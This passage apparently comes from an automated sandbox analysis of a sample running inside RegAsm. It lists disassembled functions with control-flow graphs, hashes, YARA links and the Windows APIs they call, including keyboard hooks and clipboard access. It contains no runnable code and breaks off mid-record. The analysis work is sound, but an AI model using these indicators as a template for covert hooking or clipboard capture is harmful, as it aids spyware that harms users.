61ed1be-61ed1c1 530->534 535 61ed177-61ed1b9 530->535 539 61ed99d call 61edab5 533->539 540 61ed9aa-61ed9ad 533->540 534->507 534->536 535->534 542 61ed20f-61ed251 536->542 543 61ed256-61ed259 536->543 554 61ed9a3-61ed9a5 539->554 549 61ed9af-61ed9db 540->549 550 61ed9e0-61ed9e3 540->550 542->543 543->500 548 61ed25f-61ed262 543->548 555 61ed2ab-61ed2ae 548->555 556 61ed264-61ed273 548->556 549->550 558 61eda06-61eda08 550->558 559 61ed9e5-61eda01 550->559 554->540 571 61ed2b9-61ed2bc 555->571 572 61ed2b0-61ed2b2 555->572 568 61ed275-61ed27a 556->568 569 61ed282-61ed28e 556->569 566 61eda0f-61eda12 558->566 567 61eda0a 558->567 559->558 566->533 576 61eda14-61eda23 566->576 567->566 568->569 569->515 578 61ed294-61ed2a6 569->578 582 61ed2be-61ed2d4 571->582 583 61ed2d9-61ed2db 571->583 580 61ed2eb-61ed2f4 572->580 581 61ed2b4 572->581 602 61eda8a-61eda9f 576->602 603 61eda25-61eda88 call 61e6598 576->603 578->555 587 61ed2f6-61ed2fb 580->587 588 61ed303-61ed30f 580->588 581->571 582->583 585 61ed2dd 583->585 586 61ed2e2-61ed2e5 583->586 585->586 586->490 586->580 587->588 592 61ed315-61ed329 588->592 593 61ed420-61ed425 588->593 592->497 612 61ed32f-61ed341 592->612 593->497 603->602 621 61ed365-61ed367 612->621 622 61ed343-61ed349 612->622 623 61ed371-61ed37d 621->623 624 61ed34d-61ed359 622->624 625 61ed34b 622->625 634 61ed37f-61ed389 623->634 635 61ed38b 623->635 628 61ed35b-61ed363 624->628 625->628 628->623 636 61ed390-61ed392 634->636 635->636 636->497 639 61ed398-61ed3b4 call 61e6598 636->639 647 61ed3b6-61ed3bb 639->647 648 61ed3c3-61ed3cf 639->648 647->648 648->593 650 61ed3d1-61ed41e 648->650 650->497 703 61ed73d-61ed742 702->703 704 61ed74a-61ed753 702->704 703->704 704->515 705 61ed759-61ed76c 704->705 707 61ed946-61ed950 705->707 708 61ed772-61ed778 705->708 707->701 707->702 709 61ed77a-61ed77f 708->709 710 61ed787-61ed790 708->710 709->710 710->515 711 61ed796-61ed7b7 710->711 714 61ed7b9-61ed7be 711->714 715 61ed7c6-61ed7cf 711->715 714->715 715->515 716 61ed7d5-61ed7f2 715->716 716->707 719 61ed7f8-61ed7fe 716->719 719->515 720 61ed804-61ed81d 719->720 722 61ed939-61ed940 720->722 723 61ed823-61ed84a 720->723 722->707 722->719 723->515 726 61ed850-61ed85a 723->726 726->515 727 61ed860-61ed877 726->727 729 61ed879-61ed884 727->729 730 61ed886-61ed8a1 727->730 729->730 730->722 735 61ed8a7-61ed8c0 call 61e6598 730->735 739 61ed8cf-61ed8d8 735->739 740 61ed8c2-61ed8c7 735->740 739->515 741 61ed8de-61ed932 739->741 740->739 741->722
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q
                                                  • API String ID: 0-3067366958
                                                  • Opcode ID: 74e5f631ca4fc6b668fe8823795465e2739301c59439ec7bb87dbaa06e6a726b
                                                  • Instruction ID: 2336259dff9a78a22be21e90f134c165f7d932272fd9537d5dca179d90437d06
                                                  • Opcode Fuzzy Hash: 74e5f631ca4fc6b668fe8823795465e2739301c59439ec7bb87dbaa06e6a726b
                                                  • Instruction Fuzzy Hash: 94626A34A007059FCB25EF78E990A9EB7E2FF84710B248A68D0059F359DB35ED46CB91
                                                  Function 061E4B60 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 749 61e4b60-61e4b84 750 61e4b86-61e4b89 749->750 751 61e4baa-61e4bad 750->751 752 61e4b8b-61e4ba5 750->752 753 61e528c-61e528e 751->753 754 61e4bb3-61e4cab 751->754 752->751 756 61e5295-61e5298 753->756 757 61e5290 753->757 772 61e4d2e-61e4d35 754->772 773 61e4cb1-61e4cfe call 61e5409 754->773 756->750 759 61e529e-61e52ab 756->759 757->756 774 61e4d3b-61e4dab 772->774 775 61e4db9-61e4dc2 772->775 786 61e4d04-61e4d20 773->786 792 61e4dad 774->792 793 61e4db6 774->793 775->759 790 61e4d2b-61e4d2c 786->790 791 61e4d22 786->791 790->772 791->790 792->793 793->775
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq$\Oq
                                                  • API String ID: 0-132346853
                                                  • Opcode ID: 0926f06eceb84f193b2b5feeecd6552ce847500208f9989f7fa8cfe229cd7dc5
                                                  • Instruction ID: 6db89eeeda605772e79e64888267f51564dd83b913ea76f1ff268e4542161339
                                                  • Opcode Fuzzy Hash: 0926f06eceb84f193b2b5feeecd6552ce847500208f9989f7fa8cfe229cd7dc5
                                                  • Instruction Fuzzy Hash: 29617334F002089FEB549FA4C8147AEBBF6FF88300F24842AD506EB395DB758D458B91
                                                  Function 061E9140 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1137 61e9140-61e9175 1138 61e9177-61e917a 1137->1138 1139 61e9a38-61e9a3b 1138->1139 1140 61e9180-61e9195 1138->1140 1141 61e9a3d-61e9a5c 1139->1141 1142 61e9a61-61e9a63 1139->1142 1147 61e91ad-61e91c3 1140->1147 1148 61e9197-61e919d 1140->1148 1141->1142 1144 61e9a6a-61e9a6d 1142->1144 1145 61e9a65 1142->1145 1144->1138 1149 61e9a73-61e9a7d 1144->1149 1145->1144 1154 61e91ce-61e91d0 1147->1154 1150 61e919f 1148->1150 1151 61e91a1-61e91a3 1148->1151 1150->1147 1151->1147 1155 61e91e8-61e9259 1154->1155 1156 61e91d2-61e91d8 1154->1156 1167 61e925b-61e927e 1155->1167 1168 61e9285-61e92a1 1155->1168 1157 61e91dc-61e91de 1156->1157 1158 61e91da 1156->1158 1157->1155 1158->1155 1167->1168 1173 61e92cd-61e92e8 1168->1173 1174 61e92a3-61e92c6 1168->1174 1179 61e92ea-61e930c 1173->1179 1180 61e9313-61e932e 1173->1180 1174->1173 1179->1180 1185 61e9353-61e9361 1180->1185 1186 61e9330-61e934c 1180->1186 1187 61e9363-61e936c 1185->1187 1188 61e9371-61e93eb 1185->1188 1186->1185 1187->1149 1194 61e93ed-61e940b 1188->1194 1195 61e9438-61e944d 1188->1195 1199 61e940d-61e941c 1194->1199 1200 61e9427-61e9436 1194->1200 1195->1139 1199->1200 1200->1194 1200->1195
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: 3a800849f5ea1f16f13def6b6b8a9b58bddbc41e3eb360948594a9e90b3c0a70
                                                  • Instruction ID: 092938502919bbc5175f9f802c204e727448e4161c1073f90869e27c554efb7d
                                                  • Opcode Fuzzy Hash: 3a800849f5ea1f16f13def6b6b8a9b58bddbc41e3eb360948594a9e90b3c0a70
                                                  • Instruction Fuzzy Hash: A1515E30B006059FDB54DB79D861BAE7BF2BF89300F1088A9D809DB348EE70DD468B91
                                                  Function 061E4B50 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1240 61e4b50-61e4b54 1241 61e4b56-61e4b6e 1240->1241 1242 61e4b70-61e4b84 1240->1242 1241->1242 1243 61e4b86-61e4b89 1242->1243 1244 61e4baa-61e4bad 1243->1244 1245 61e4b8b-61e4ba5 1243->1245 1246 61e528c-61e528e 1244->1246 1247 61e4bb3-61e4cab 1244->1247 1245->1244 1249 61e5295-61e5298 1246->1249 1250 61e5290 1246->1250 1265 61e4d2e-61e4d35 1247->1265 1266 61e4cb1-61e4cfe call 61e5409 1247->1266 1249->1243 1252 61e529e-61e52ab 1249->1252 1250->1249 1267 61e4d3b-61e4dab 1265->1267 1268 61e4db9-61e4dc2 1265->1268 1279 61e4d04-61e4d20 1266->1279 1285 61e4dad 1267->1285 1286 61e4db6 1267->1286 1268->1252 1283 61e4d2b-61e4d2c 1279->1283 1284 61e4d22 1279->1284 1283->1265 1284->1283 1285->1286 1286->1268
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq
                                                  • API String ID: 0-3167736908
                                                  • Opcode ID: 48420b33ce6fe54adbe5f0880116c319495ab9bfce9ab0d21bc6877779a9ded3
                                                  • Instruction ID: a7b9329e72c5b4703f30d66699a318cea527e97afacd909d6a912c64e0bf661b
                                                  • Opcode Fuzzy Hash: 48420b33ce6fe54adbe5f0880116c319495ab9bfce9ab0d21bc6877779a9ded3
                                                  • Instruction Fuzzy Hash: E9518834F002089FDB549FA5C815BAEBBF6FF88300F24852AE105AB395DB759C41CBA1
                                                  Function 00E5E9A8 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676670526.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_e50000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b7e32f6c9776468cf974630991d14891db0b5152b343cfe883addb2dfbc0eca
                                                  • Instruction ID: 198f3851d0068f8cc291f65c72ad7eaa2ad63adb886b8200ae99a71f254b4a18
                                                  • Opcode Fuzzy Hash: 0b7e32f6c9776468cf974630991d14891db0b5152b343cfe883addb2dfbc0eca
                                                  • Instruction Fuzzy Hash: 05512472D043958FCB14CFB5E8042EEBBF1AF85211F08896BD809E7741EB349949CBA1
                                                  Function 061D254D Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 061D26AA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 14723c466486ca320355466a386c8bd7830a75f0bd90783410311260d10cafb7
                                                  • Instruction ID: 26ca1e0fa324053d26a999da16e8ebbfe5c0bfaf937cfa116aa4374f63fb8395
                                                  • Opcode Fuzzy Hash: 14723c466486ca320355466a386c8bd7830a75f0bd90783410311260d10cafb7
                                                  • Instruction Fuzzy Hash: 965101B1C00249AFDF55CFA9D980ADDBFB1FF48310F25812AE919AB224D771AA45CF50
                                                  Function 061D2598 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 061D26AA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: b3d1cdb4b49db714e7c5b1f4734499555e0058e507ded40eb4b63e7e6fde6d0f
                                                  • Instruction ID: 18d9f4034a538a421b3c09aa89954431940f542e0201ba4817a8c4c8294fe0ac
                                                  • Opcode Fuzzy Hash: b3d1cdb4b49db714e7c5b1f4734499555e0058e507ded40eb4b63e7e6fde6d0f
                                                  • Instruction Fuzzy Hash: 4941CEB1D00348DFDB14CF9AC984ADEBBF5BF48310F24812AE819AB210D775A985CF94
                                                  Function 061D5F7C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 061D73D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 7e5cd5aa85d96e0fa4ef4d058a382f0442489b62ceed3908c5f6f82bf23086eb
                                                  • Instruction ID: 6f56f50acba86460d337b0521a9237274b1fa72a87e41426c2828b29c2f1d1b8
                                                  • Opcode Fuzzy Hash: 7e5cd5aa85d96e0fa4ef4d058a382f0442489b62ceed3908c5f6f82bf23086eb
                                                  • Instruction Fuzzy Hash: B2412AB9900345DFDB54CF99C448BAABBF5FF88314F148859D919AB361D374A841CBA0
                                                  Function 061D9C68 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 78bc00aec8d79a46e15e84cbedfbfdbf88f1f09a08e5f885d677facc1f1988d5
                                                  • Instruction ID: 0c1294f961deb8450d3b1959099c4cc2066555ce9f5f10b854376463b9434951
                                                  • Opcode Fuzzy Hash: 78bc00aec8d79a46e15e84cbedfbfdbf88f1f09a08e5f885d677facc1f1988d5
                                                  • Instruction Fuzzy Hash: D721B172A003459FCB15EF69D941B9EBBF1FF84310F10886DE469AB391CB35A905CBA1
                                                  Function 061D805C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 430c4ad15b573215b25e50813a11078201398f3b1091abe41e2a634e16c5f192
                                                  • Instruction ID: 623d56464aaf397cf3fb10eac4b50de04f44a1e03dbbc0841aa4f0fa211dbadb
                                                  • Opcode Fuzzy Hash: 430c4ad15b573215b25e50813a11078201398f3b1091abe41e2a634e16c5f192
                                                  • Instruction Fuzzy Hash: D531E3B0D01248DFDB64CF99C984BDDBBF5BB48308F248459E404BB390D775A949CB65
                                                  Function 061D7C18 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 133eb837696294c0b23ff5e4a2ea333a9c9bd4dbd3540130a50e0abf0ca0e6e2
                                                  • Instruction ID: 0240fb77d717c1a26d1ea421cca446bed15ebcd30803a95aea281d43a8a29392
                                                  • Opcode Fuzzy Hash: 133eb837696294c0b23ff5e4a2ea333a9c9bd4dbd3540130a50e0abf0ca0e6e2
                                                  • Instruction Fuzzy Hash: F93102B4D01348DFEB64CF99C984B9EBBF4BB48304F248459E404AB390D7B4A849CBA5
                                                  Function 061D6470 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 061D64FF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 149d9d3df8e3309b94613791468fadf71c655a9c1f5ac153ec9eafd60be97085
                                                  • Instruction ID: 58b22ba73c6ce7a5326499f9003edb58b2ea4845386c205a5061794717188dcd
                                                  • Opcode Fuzzy Hash: 149d9d3df8e3309b94613791468fadf71c655a9c1f5ac153ec9eafd60be97085
                                                  • Instruction Fuzzy Hash: 5321E6B5D002489FDB10CFAAD984ADEFFF4EB48314F14841AE955A3311D374A944CFA5
                                                  Function 061D6478 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 061D64FF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 7695ca047260a3c1995b3f28847831097d6a4dca5effe4dcb7614512da17f02c
                                                  • Instruction ID: 1acb5791d86f303dead96acce2683c8588edc41cbb2e5a9ed7c389a17cb60166
                                                  • Opcode Fuzzy Hash: 7695ca047260a3c1995b3f28847831097d6a4dca5effe4dcb7614512da17f02c
                                                  • Instruction Fuzzy Hash: E121E2B5D002489FDB10CFAAD984ADEFBF4EB48324F14841AE918A3310D378A944CFA5
                                                  Function 061D9BA9 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: fdf6b1187b253e432756cd2ff8af6ab77961803274d56bc75261787cd6f53576
                                                  • Instruction ID: 4f42ed273ac7d35476800fabb5fc7ffaf49a7de9aba3ea8ae0d377becf41b528
                                                  • Opcode Fuzzy Hash: fdf6b1187b253e432756cd2ff8af6ab77961803274d56bc75261787cd6f53576
                                                  • Instruction Fuzzy Hash: AB2113B5D002099FDB14CFAAD944BEEFBF4AB88310F14882AE419A7250C774A944CFA5
                                                  Function 061D9BB0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 96ed44ab9dbf2cbe80816085859b524e613de87282f2b394e53e1e1fe7c5fafe
                                                  • Instruction ID: 73f867001cffd8ec268c5e852db3d0372ce37dba38d95a285b3f53133e87091e
                                                  • Opcode Fuzzy Hash: 96ed44ab9dbf2cbe80816085859b524e613de87282f2b394e53e1e1fe7c5fafe
                                                  • Instruction Fuzzy Hash: 642136B5D002088FDB14CF9AD944BEEFBF4FB88310F14882AE419A7250C774A944CFA5
                                                  Function 00E5EA90 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E5EAF7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676670526.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_e50000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 83cfcba57f6ec9c14b2369ed3344277b2a2ba7ca064cbe2b8bff31d09f4759c3
                                                  • Instruction ID: 1ab6a1fb5cc0c02c111042ccd597526fc1a9c73ed242b241994ac71e83080de9
                                                  • Opcode Fuzzy Hash: 83cfcba57f6ec9c14b2369ed3344277b2a2ba7ca064cbe2b8bff31d09f4759c3
                                                  • Instruction Fuzzy Hash: 8E1114B6C006599FDB14CF9AD444BDEFBF4AB48324F14852AE818B7340D378A944CFA5
                                                  Function 061D6203 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: f59bdc71a9d78cc54196a26f4838e1db7c82a4e2aff7caf9f2297ef5a0f99675
                                                  • Instruction ID: 3d87db0ed5d9af9d1cffaf3040d3be1e74d0642206d0ee5f07aadd57d98c6594
                                                  • Opcode Fuzzy Hash: f59bdc71a9d78cc54196a26f4838e1db7c82a4e2aff7caf9f2297ef5a0f99675
                                                  • Instruction Fuzzy Hash: 071155B58043888FDB20CFAAD844B9EBFF4EB08224F14845AE458A7351C378A544CBA9
                                                  Function 061D14EA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 061D1556
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 16372cd6a0e0493664fff85e94157173f23ee492d3f402f781435e4a4748af6b
                                                  • Instruction ID: ba5e233aecbe28b222cd6109c6f6172c74fadd982cbc861c7e0e0e4e4effabfe
                                                  • Opcode Fuzzy Hash: 16372cd6a0e0493664fff85e94157173f23ee492d3f402f781435e4a4748af6b
                                                  • Instruction Fuzzy Hash: 571132B6C002489FDB24CF9AD844ACEFBF4EB49210F10841AD41AB7210C378A545CFA1
                                                  Function 061D14F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 061D1556
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f9e161de6123753fbc8e33b2759ab3f1c3a753c90ca20b41ac4d6959e60f1e72
                                                  • Instruction ID: e0593b23cd2cb30193c506cdd5485544f0d9ae1feb031f49ef53ec691ca9b8ba
                                                  • Opcode Fuzzy Hash: f9e161de6123753fbc8e33b2759ab3f1c3a753c90ca20b41ac4d6959e60f1e72
                                                  • Instruction Fuzzy Hash: A51113B6C002498FDB10CF9AD844BDEFBF4EB49214F14841AD419B7210C379A545CFA5
                                                  Function 061D620C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5d9eb58b80f5210776d2abb9eb29c734ca32c061310455c7fa8fd55e1bc0f02f
                                                  • Instruction ID: 6d1f2d2d5ef844cdec263fc181d0f206da8e4b956dade3a66de45ef348a93acc
                                                  • Opcode Fuzzy Hash: 5d9eb58b80f5210776d2abb9eb29c734ca32c061310455c7fa8fd55e1bc0f02f
                                                  • Instruction Fuzzy Hash: 9A1112B5C047488FDB20DF9AD944BDEFBF4EB48224F24841AE519A7750C378A944CFA9
                                                  Function 061D5FD4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,061D7625), ref: 061D76AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 8c7bff4c0610bd49ad4dd900db3c5d8aa9c4c8a31e46291a2ae344f0d2645402
                                                  • Instruction ID: 5e0f56f9ea183ed0010a7a4d837acde7cdb2d9ab86d9700d8dea8348ed7bda92
                                                  • Opcode Fuzzy Hash: 8c7bff4c0610bd49ad4dd900db3c5d8aa9c4c8a31e46291a2ae344f0d2645402
                                                  • Instruction Fuzzy Hash: 3211F5B5C002898FDB60DF9AD944B9EFBF4EB48314F20841AE519A7350D374A944CBA5
                                                  Function 061D7649 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,061D7625), ref: 061D76AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: e57efc6d51e59492a521d293e62e64d34467398bee8d100ecf28db43296cedcd
                                                  • Instruction ID: 7d0345297c17a8aa32036ca99110f1db38a12b0a620fbac6e396e5e2fc18b7c7
                                                  • Opcode Fuzzy Hash: e57efc6d51e59492a521d293e62e64d34467398bee8d100ecf28db43296cedcd
                                                  • Instruction Fuzzy Hash: CC1115B5C002488FDB20DF9AD944BDEFBF4EB48324F24841AE519A7750D374A544CFA5
                                                  Function 061D7F19 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: c179578ce9ebad14b64262f02f4484fa16bbf54a1674d7aabea53a71e3a7e5a4
